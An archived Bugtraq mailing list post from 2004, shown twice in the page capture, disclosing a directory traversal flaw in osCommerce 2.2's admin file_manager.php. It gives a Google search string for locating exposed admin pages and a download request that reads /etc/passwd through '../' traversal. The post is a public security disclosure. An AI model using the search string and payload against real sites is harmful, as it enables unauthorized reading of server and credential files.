Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
oscommerce 2.2 file_manager.php file browsing
May 17 2004 07:37PM
Rene (l0om excluded org)
l0om - l0om[at]excluded.org - www.excluded.org
greets,
while i was "warsearching" with google i suddenly
have been on the admin interfaces of many oscommerce
sites. i made a:
allinurl:admin/file_manager.php
for nomal you can only view your oscommerce
directorys, but if you type in the following you can
view any file on the server with the webservers
permissions:
file_manager.php?action=download&filename=../../../../../../../../
etc/passwd
as you have to be logged in this isnt hot but i think
its better to know about it.
l0om
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
l0om - l0om[at]excluded.org - www.excluded.org
greets,
while i was "warsearching" with google i suddenly
have been on the admin interfaces of many oscommerce
sites. i made a:
allinurl:admin/file_manager.php
for nomal you can only view your oscommerce
directorys, but if you type in the following you can
view any file on the server with the webservers
permissions:
file_manager.php?action=download&filename=../../../../../../../../
etc/passwd
as you have to be logged in this isnt hot but i think
its better to know about it.
l0om
[ reply ]